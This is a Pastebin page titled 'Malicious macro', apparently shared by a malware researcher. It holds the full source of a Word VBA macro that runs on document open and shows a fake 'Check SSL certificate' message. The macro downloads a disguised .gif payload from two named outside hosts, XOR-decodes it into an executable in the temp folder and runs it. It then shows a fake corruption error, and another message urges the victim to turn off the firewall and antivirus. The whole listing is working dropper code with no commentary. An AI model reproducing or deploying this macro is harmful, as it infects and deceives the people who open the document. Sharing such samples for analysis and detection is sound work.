API tools faq
paste
Advertisement
dynamoo

Malicious macro

dynamoo
Mar 28th, 2017
876
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 4.45 KB | None | 0 0
raw download clone embed print report
  1. Rem Attribute VBA_ModuleType=VBADocumentModule
  2. Option VBASupport 1
  3. #If VBA7 And Win64 Then
  4. Private Declare PtrSafe Function wefjwekgn Lib "shell32.dll" Alias "ShellExecuteA" (ByVal hwnd As Long, ByVal Operation As String, ByVal Filename As String, Optional ByVal Parameters As String, Optional ByVal Directory As String, Optional ByVal WindowStyle As Long = vbMaximizedFocus) As LongLong
  5. Private Declare PtrSafe Function uwhdhjwgf Lib "kernel32" Alias "GetTempPathA" (ByVal nBufferLength As Long, ByVal lpBuffer As String) As Long
  6. Private Declare PtrSafe Function qhduhfe Lib "kernel32" Alias "GetTempFileNameA" (ByVal lpszPath As String, ByVal lpPrefixString As String, ByVal wUnique As Long, ByVal lpTempFileName As String) As Long
  7. Private Declare PtrSafe Function jiwoiefjweg Lib "urlmon" Alias "URLDownloadToFileA" (ByVal pCaller As Long, ByVal szURL As String, ByVal szFileName As String, ByVal dwReserved As Long, ByVal lpfnCB As Long) As Long
  8. #Else
  9. Private Declare Function wefjwekgn Lib "shell32.dll" Alias "ShellExecuteA" (ByVal hwnd As Long, ByVal Operation As String, ByVal Filename As String, Optional ByVal Parameters As String, Optional ByVal Directory As String, Optional ByVal WindowStyle As Long = vbMaximizedFocus) As Long
  10. Private Declare Function uwhdhjwgf Lib "kernel32" Alias "GetTempPathA" (ByVal nBufferLength As Long, ByVal lpBuffer As String) As Long
  11. Private Declare Function qhduhfe Lib "kernel32" Alias "GetTempFileNameA" (ByVal lpszPath As String, ByVal lpPrefixString As String, ByVal wUnique As Long, ByVal lpTempFileName As String) As Long
  12. Private Declare Function jiwoiefjweg Lib "urlmon" Alias "URLDownloadToFileA" (ByVal pCaller As Long, ByVal szURL As String, ByVal szFileName As String, ByVal dwReserved As Long, ByVal lpfnCB As Long) As Long
  13. #End If
  14.  
  15.  
  16.  
  17. Sub Document_Open()
  18.  
  19. Dim ujfiejgirg As String
  20. Dim wefnwiouirh As Long
  21. Dim mewiheij As Long
  22. Dim wkjiegjbnffd As Integer
  23. Dim pfkjwigjkd() As Byte
  24.  
  25. #If Win64 Then
  26. Dim wjiejeiogif As LongLong
  27. #Else
  28. Dim wjiejeiogif As Long
  29. #End If
  30.  
  31. ActiveDocument.Content.Delete
  32. ActiveDocument.PageSetup.LeftMargin = 240
  33. ActiveDocument.PageSetup.TopMargin = 100
  34.  
  35. Set myRange = ActiveDocument.Content
  36.  
  37. With myRange.Font
  38. .Name = "Verdana"
  39. .Size = 14
  40. End With
  41.  
  42. ActiveDocument.Range.Text = "Check SSL certificate." & vbLf & " Please wait..."
  43.  
  44. DoEvents
  45. DoEvents
  46. DoEvents
  47. DoEvents
  48.  
  49. ujfiejgirg = iwjhufuebnubg
  50. wefnwiouirh = jiwoiefjweg(0, "http://galaxytown.net/store/read.gif", ujfiejgirg, 0, 0)
  51. mewiheij = FileLen(ujfiejgirg)
  52.  
  53. If wefnwiouirh <> 0 And mewiheij < 472819 Then
  54. wefnwiouirh = jiwoiefjweg(0, "http://www.effeelle.eu/img/logo.gif", ujfiejgirg, 0, 0)
  55. mewiheij = FileLen(ujfiejgirg)
  56. End If
  57.  
  58.  
  59. If mewiheij < 423621 Then
  60. ActiveDocument.Content.Delete
  61. MsgBox "No internet access. Turn off any firewall or anti-virus software and try again.", vbCritical, "Error"
  62. Exit Sub
  63. End If
  64.  
  65. wkjiegjbnffd = FreeFile
  66. Open ujfiejgirg For Binary As #wkjiegjbnffd
  67. ReDim pfkjwigjkd(0 To LOF(wkjiegjbnffd) - 1)
  68. Get #wkjiegjbnffd, , pfkjwigjkd()
  69. Close #wkjiegjbnffd
  70.  
  71. Call wjhhuuuufdp(pfkjwigjkd())
  72.  
  73. ujfiejgirg = Left(ujfiejgirg, Len(ujfiejgirg) - 3)
  74. ujfiejgirg = ujfiejgirg & "exe"
  75.  
  76. wkjiegjbnffd = FreeFile
  77. Open ujfiejgirg For Binary As #wkjiegjbnffd
  78. Put #wkjiegjbnffd, , pfkjwigjkd()
  79. Close #wkjiegjbnffd
  80.  
  81.  
  82. wjiejeiogif = wefjwekgn(0, "Open", "explorer.exe", ujfiejgirg)
  83.  
  84. ActiveDocument.Content.Delete
  85. MsgBox "The file is corrupted and cannot be opened", vbCritical, "Error"
  86.  
  87. End Sub
  88.  
  89.  
  90. Public Function iwjhufuebnubg() As String
  91. Dim djfie As String * 512
  92. Dim pwifu As String * 576
  93. Dim dwuf As Long
  94. Dim wefkg As String
  95. dwuf = uwhdhjwgf(512, djfie)
  96. If (dwuf > 0 And dwuf < 512) Then
  97. dwuf = qhduhfe(djfie, 0, 0, pwifu)
  98. If dwuf <> 0 Then
  99. wefkg = Left$(pwifu, InStr(pwifu, vbNullChar) - 1)
  100. End If
  101. iwjhufuebnubg = wefkg
  102. End If
  103. End Function
  104.  
  105. Public Sub wjhhuuuufdp(pfkjwigjkd() As Byte)
  106. Dim dfety As Long
  107. Dim bvjwi As Long
  108. Dim wbdys As Long
  109. Dim dvywi(256) As Byte
  110. Dim wdals As Long
  111. Dim dwiqh As Long
  112.  
  113.  
  114. bvjwi = UBound(pfkjwigjkd) + 1
  115.  
  116. For dfety = 10 To 265
  117. dvywi(dfety - 10) = pfkjwigjkd(dfety)
  118. Next
  119.  
  120. wdals = UBound(dvywi) + 1
  121.  
  122. dwiqh = 0
  123. For dfety = 266 To (bvjwi - 267)
  124. pfkjwigjkd(dfety - 266) = pfkjwigjkd(dfety) Xor dvywi(dwiqh)
  125. dwiqh = dwiqh + 1
  126.  
  127. If dwiqh = (wdals - 1) Then
  128. dwiqh = 0
  129. End If
  130. Next
  131.  
  132. ReDim Preserve pfkjwigjkd(bvjwi - 267)
  133.  
  134. End Sub
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!